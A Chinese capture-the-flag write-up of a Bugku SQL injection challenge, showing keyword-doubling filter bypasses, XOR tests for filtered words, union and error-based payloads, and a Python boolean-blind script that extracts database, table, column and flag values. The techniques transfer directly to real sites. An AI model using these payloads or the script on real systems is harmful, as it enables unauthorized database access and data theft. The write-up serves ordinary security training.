網址:http://123.206.87.240:9004/1ndex.php?id=1
前言:bugku中一涉及多次注入的題
1、異或注入(判斷字符是否被過濾)
0X00 很明顯 注入點在id上
參數id只有5個,等於6的時候顯示Error
測試1 id=1' or 1=1#
返回錯誤,猜測可能有字符被過濾
測試2 id=1' oorr 1=1--+
返回正常結果,通過雙寫繞過
0X01:異或注入
那么在這種情況下該怎么檢測哪些字符被過濾??
異或注入:
id=1'^(length('被測試字符')=0)--+
例如:id=1'^(length('select')=0)--+ 發現返回錯誤
因為select被過濾,那么length('')就等於0,(length('')=0)此等式成立,返回值為1,再和1異或結果為0,所以頁面返回錯誤
檢測出select、and 、or被過濾
注意:information中有一個or
0X02:查數據庫、表、信息
列數:http://123.206.87.240:9004/1ndex.php?id=1%27%20anandd%201=2%20ununionion%20seselectlect%201,2%23
顯示2
數據表:http://123.206.87.240:9004/1ndex.php?id=1' ununionion seselectlect 1,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()--+
0X03:下一關
這一關我是用bool盲注,根據返回頁面中有沒有hello,判斷對錯
直接附上代碼:
#coding=utf-8
import requests
#url='http://123.206.87.240:9004/Once_More.php?id=1'
#temp = 'abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~'
#(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),{0},1)={1}%23'
#基於報錯的注入,正確Hello 錯誤返回nobady
def getdblen(): #數據庫名長度
for i in range(1,30):
url='http://123.206.87.240:9004/Once_More.php?id=1%27and%20length(database())='+str(i)+'%23'
s = requests.get(url)
if 'Hello' in s.text: #如果 返回頁面中有'Hello',說明payload正確
print("table len:",i)
break
def getdb():
db_name=''
data = "abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~"
for i in range(1,10):
for mes in data:
url="http://123.206.87.240:9004/Once_More.php?id=1%27and%20mid(database(),"+str(i)+",1)=%27"+mes+"%27%23" #利用mid函數選取子字符串
s = requests.get(url)
if 'Hello' in s.text:
db_name+=mes
print(db_name)
break
print("table name is:",db_name)
def gettable():
table_name=''
dbname = 'web1002-2'
data = "abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~"
url="http://123.206.87.240:9004/Once_More.php"
'''
for i in range(1,50): #數據表長度
url="http://123.206.87.240:9004/Once_More.php?id=1%27and%20length(select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27"+dbname+"%27)="+str(i)+"%23"
s = requests.get(url)
if 'Hello' in s.text:
print("table len:",i)
break
'''
for i in range(1,20):
for n in range(1,30):
for mes in data:
#url="http://123.206.87.240:9004/Once_More.php?id=1%27and%20ascii(mid((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%20"+str()+"),"+str(n)+",1))=%27"+mes+"%27%23"
payload = {'id':"1' and mid((select table_name from information_schema.tables where table_schema=database() limit %s,1),%s,1)='%s'#"%(i,n,mes)}
s = requests.get(url,params=payload)
if 'Hello' in s.text:
table_name+=mes
print(table_name)
break
print("table name :",table_name)
#limit%20'+str(x)+',1),'+str(y)+',1))=ascii(\''+str(i)+'\')%23'
#payload = {'id':"1' and mid((select table_name from information_schema.tables where table_schema=database() limit %s,1),%s,1)='%s'#"%(i,j,k)}
def getcolumn():
column_name=''
data = "abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~"
url="http://123.206.87.240:9004/Once_More.php"
for i in range(0,10):
for n in range(1,20):
for mes in data:
payload={'id':"1' and mid((select column_name from information_schema.columns where table_name='flag2' limit %s,1),%s,1)='%s'#"%(i,n,mes)}
s = requests.get(url,params=payload)
if 'Hello' in s.text:
column_name+=mes
print(column_name)
break
print("column name:",column_name)
def getflag():
flag=''
data = "abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~"
url="http://123.206.87.240:9004/Once_More.php"
for n in range(1,35):
for mes in data:
payload={'id':"1' and mid((select flag2 from flag2),%s,1)='%s'#"%(n,mes)}
s = requests.get(url,params=payload)
if 'Hello' in s.text:
flag += mes
print(flag)
break
print("flag :",flag)
if __name__=='__main__':
#gettablelen()
#getdb()
#gettable()
#getcolumn()
getflag()
還有一種回顯的方法
爆數據庫名:
http://123.206.87.240:9004/Once_More.php?id=1' and
(extractvalue(1,concat(0x7e,database(),0x7e)))--+
其他payload以此類推
0Xff:總結
這題貌似還有第三關,懶不做了,這次主要是學習了異或注入查哪些字符被過濾,話有一種方法使用burpsuite查過濾規則,不曉得這里能不能用。